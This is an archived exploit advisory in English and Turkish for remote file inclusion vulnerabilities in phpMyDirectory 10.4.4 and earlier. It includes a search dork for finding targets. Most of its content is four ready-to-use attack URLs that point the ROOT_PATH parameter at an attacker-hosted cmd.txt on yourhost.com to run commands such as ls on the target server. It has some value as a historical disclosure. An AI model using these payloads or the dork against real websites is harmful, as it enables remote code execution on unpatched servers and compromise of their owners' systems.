TUCoPS :: Web :: PHP :: b06-2405.htm

TUCoPS :: Web :: PHP :: b06-2405.htm
phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)

phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!) phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)


ENGLISH=0D
=0D
# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities=0D
=0D
# Dork   :   "powered by phpmydirectory"=0D
=0D
# Author :   ajann=0D
=0D
# greetz :   Nukedx,TheHacker =0D
=0D
# Exploit;=0D
=0D
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
=0D
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
=0D
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
=0D
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
=0D
# ajann,Turkey=0D
=0D
=0D
TURKISH=0D
=0D
# Başlık          :   phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities=0D
# S=F6zc=FCk[Arama]   :   "powered by phpmydirectory"=0D
# A=E7ığı Bulan     :   ajann=0D
# greetz          :   Nukedx,TheHacker =0D
# A=E7ık bulunan dosyalar;=0D
=0D
### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
### http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
### http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
### SOME; http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls=0D 
=0D
A=E7ıklama: =0D
Temalarda bulunan footer.php dosyası g=FCvenlik a=E7ığına yol a=E7maktadır.Bu sayede uzaktan kod =E7alıştırılabilir.=0D
defaults_setup.php kurulumdan sonra silinmemişse aynı a=E7ık uygulanabilmektedir.=0D
test/header.php b=F6l=FCm=FC ise bazen denk gelmektedir,aynı a=E7ık bulunmaktadır.=0D
A=E7ık 10.4.4 dahil alt s=FCr=FCmlerinde =E7alışmaktadır.=0D
=0D
Thanks.